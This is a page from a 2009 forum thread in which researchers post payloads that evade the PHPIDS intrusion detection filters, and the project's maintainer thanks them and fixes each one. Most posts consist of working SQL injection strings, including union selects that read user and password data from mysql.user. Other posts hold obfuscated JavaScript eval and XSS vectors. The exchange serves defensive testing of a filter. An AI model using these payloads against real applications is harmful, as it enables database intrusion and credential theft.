Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...2122232425262728293031Next
Current Page: 26 of 31
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 13, 2009 09:21AM

Managed to get a union working

-1' union ((select 1/1 from Table where (select version( )/ 1) like 5)) order by '1
-1' union ((select (select version()/1 )/1,2/1,3 from Table)) order by '1
-1' union ((select (select user),(select password),1/1 from mysql.user)) order by '1
-1' union ((select (select table_name),1/1 from information_schema.tables)) order by '1
-1' union ((select (select substring((select database() limit 1),1/1,20) limit 1),2/1 from Table)) order by '1

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 13, 2009 09:23AM

It seems we have another recruit :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 13, 2009 09:45AM

Another HTML5 Firefox beta 3.1 vector:-

http://www.businessinfo.co.uk/labs/phpids/phpids8.html

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: March 22, 2009 11:26AM

Hey guys - late reaction again but I fixed all of the recent vectors. I think there'll be a 0.5.6 the next days to cover all the recent fixes in a release version. Thx for the reports!

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Reiners
Date: March 22, 2009 02:20PM

5'-1 like binary '0
2'-1 - user() or 1 = '1
asdasd' like id or 1 = '1

you may want to block var declarations too, like:

2'-2 like binary @a:='0

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: March 22, 2009 02:59PM

this[(('eva')+ new Array) + 'l']((/x.x.x.x/+name)+/x.x.x.x/) -> http://p42.us/phpids/89.html

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 24, 2009 09:33PM

1' having '1
1'; select 'sqli
1'; select 1 order by 1/'1
-1'union ( ((select'null')))--null



Edited 1 time(s). Last edit at 03/25/2009 02:54AM by lightos.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: March 25, 2009 12:32AM

this[('eva')+this.status +'l'](/xx.x.x/+name) -> http://p42.us/phpids/90.html

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 28, 2009 08:17AM

') | (1 -'
1') | user--null
' having substring(version(),1,1) like 5 or 1 like ' 1
' having substring(user(),1,1) like (select 'r') or 1 like ' 1

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: March 28, 2009 02:56PM

@lightos

Do you have a blog? I'm impressed with your SQLi foo

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 28, 2009 08:04PM

Thanks Gareth, I appreciate the compliment especially from someone of your talents
No blog yet, maybe someday though.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: March 31, 2009 06:11PM

1' and 1 != char(null) or 1 /'null
1' and 1 = hex(null-1 or 1) or 1 /'null
-1' or substring(null/null,1/null,1) or '1



Edited 2 time(s). Last edit at 03/31/2009 09:57PM by lightos.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: March 31, 2009 06:52PM

this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+name,new Array) -> http://p42.us/phpids/91.html

[edit] for fun, this also works: this[[]+('eva')+(/l.is.broken.up.with.a/,new Array)+'l'](/ets.finish.by.passing.it.the.variables/+name,new Array)



Edited 1 time(s). Last edit at 03/31/2009 11:31PM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: April 05, 2009 03:07PM

Hey guys!

Sry for the delayed answer again... I think most of the vectors are now being detected. Thanks a lot! The sqli vectors are really far beyond - very nice work, lightos!

Btw - if you'd like a new application to hammer on just drop me a line. We are opening up five accounts for testing purposes next week (privateĀ² alpha so to say) *g*

Greetings and nice rest-of-the-weekend,
.mario

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: April 05, 2009 04:32PM

1' and 1 != 0x71 or 1 /'null
1' and 1 = 0x71 or 1 or 1 /'null
1'/null or user=0x6C696768746F73 or '0

:)



Edited 1 time(s). Last edit at 04/06/2009 06:19AM by lightos.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: April 05, 2009 04:37PM

this[[]+('eva')+(/x/,new Array)+'l'](/count%me%in%for%alpha%testing/+name,delete 1) -> http://p42.us/phpids/92.html

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: April 10, 2009 02:38AM

1' order by 1/*null-PHPIDS
1' and 0x1 like 0x1/*null-
1' and 0x1 = 0x1/*null-
1' and /*null*/0x7 = 0x7 or '0

1' and 0x0 != mid(user(),1,1) or null/ 'null



Edited 1 time(s). Last edit at 04/10/2009 03:12AM by lightos.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: lightos
Date: April 23, 2009 02:08AM

1' '
1' ''

Simple but works.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: April 23, 2009 01:40PM

Nice ones - thx :) The last ones are almost impossible to fix. I tried but am sure this is going to generate tons of false alerts.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: April 23, 2009 03:22PM

I was gonna IM you this but then I thought other people would want to know. What is happening with PHPIDS? Do you still plan to go down the blacklist route? Is the project going to continue?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: April 23, 2009 03:40PM

I wasn't planning to announce that way but...

Honestly I plan to give up the lead - someone else will be taking over in July. The thing is it already does most of what it can do and my motivation is not that high anymore to make minor regex tweaks once or twice a week. So some fresh wind for the PHPIDS can't be wrong...



Edited 1 time(s). Last edit at 04/23/2009 03:44PM by .mario.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: April 24, 2009 09:08AM

Hey Mario sorry if you didn't want anyone to know yet (me and my big mouth).

I'd just like to say well done on a fantastic project and although you are not continuing it you can be proud in what you have achieved. So many good things have come out of the phpids research, the vectors have always been great to work on and can be a real challenge to produce one at times.

I hope the PHPIDS project continues after you've left as I'm a big fan of it. If I ever go to a conference then I'll be sure you buy You, Christian and Lars a well deserved beer.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Spyware
Date: April 24, 2009 09:56PM

I always followed this thread with great interest. You guys did a great job of developing a wonderful application which provoked a lot of (bleeding-edge) research. Mario, Christian and Lars, well done!

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: May 11, 2009 05:29PM

-setTimeout(
1E1+
',aler\
t ( /Mario dont go, its fun phpids rocks/ ) + 1E100000 ' )

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: May 11, 2009 06:42PM

Unbelievable stuff :) Fixed, thx!

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: sirdarckcat
Date: May 12, 2009 06:31AM

still works?
http://bit.ly/xhizE

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: June 01, 2009 05:28AM

http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/

MMMMMMMMM vectors

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.6 - the ABP unblock release to show our good will :) )
Posted by: thornmaker
Date: June 01, 2009 08:44AM

that's the coolest vector i've seen all year Gareth :)

and since you revived the thread, here's a couple more (nothing especially new): http://p42.us/phpids/93.html and http://p42.us/phpids/93.html

Options: ReplyQuote
Re: PHPIDS (0.6 - the ABP unblock release to show our good will :) )
Posted by: Gareth Heyes
Date: June 01, 2009 08:58AM

haha sweeeeeeeeeeet that's some huge payload

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.6 - the ABP unblock release to show our good will :) )
Posted by: Anonymous User
Date: June 01, 2009 06:33PM

Hehe - nice indeed. And fixed. Foreverandever :)

Options: ReplyQuote
Pages: PreviousFirst...2122232425262728293031Next
Current Page: 26 of 31


Sorry, only registered users may post in this forum.